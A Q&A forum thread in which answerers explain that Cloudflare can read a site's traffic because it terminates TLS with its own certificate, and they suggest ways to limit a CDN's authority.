We have Cloudflare in our production server and the encryption level is full, not flexible. This webpage said Cloudflare can decrypt the request. But we didn't give our server's private key to cloudflare. How this even possible? Does this mean anyone can decrypt the request without target's private key?
2 Answers
One of the ways you use cloudflare is by setting the NS records for your domain to cloudflare's name servers which in turn resolve www.mydomain.com
to their IP addresses. This means that when you go to www.mydomain.com
setup with cloudflare, it hits one of their servers. The SSL certificate for that domain is not yours, it's theirs. Check the SSL certificate for your website, you'll see that it was issued to something.cloudflaressl.com
and your domain is just one of the many in the Subject Alternative name
.
The "Full SSL" setup just means that all client traffic to cloudflare is over SSL (using their certificate), and all traffic between cloudflare and your actual server is over SSL as well (using a certificate matching your server name).
As you can see, cloudflare by definition decrypts all traffic for your website but it can do so because cloudflare technically is your website. Your actual server is just something cloudflare grabs data from when it doesn't have it cached. If you think about it, how else would it cache anything?
- 4,151
- 1
- 18
- 23
There are a number of different ways you can configure cloudflare:
- You can set cloudflare as your DNS provider, most CA considers proof of DNS control as valid proof of domain control. This allows cloudflare to create a valid DV certificate with your domain name.
- You can give cloudflare your private key, this allows you to use OV or EV certificate.
- In higher level plans, you can use keyless SSL, This allows you to use OV and EV without surrendering your keys.
In all cases, yes, cloudflare can intercept and modify any data that passes through it. This is necessary because the main way Cloudflare works is as an edge caching layer, web application firewall, and captcha. All these capabilities requires them to able to see the content of requests as they come and/or modify your pages.
There are a number of ways you can limit the authority of a CDN provider like cloudflare, if you use cloudflare to serve static files, you can serve your main site direct and use subresource integrity or add your own encryption to prevent modifications of files served via cloudflare. If you use a native application as your client (e.g. an Android app), you could pin your site's certificate, or you could require OV or EV certificate.
If you run your main domain via cloudflare, then cloudflare is effectively as powerful as your hosting provider.
- 31,279
- 6
- 69
- 93
-
1Note that even with "keyless" SSL, you still have to allow them to MITM and read the connection. It just means they don't have access to the private key itself. – forest Dec 19 '17 at 04:13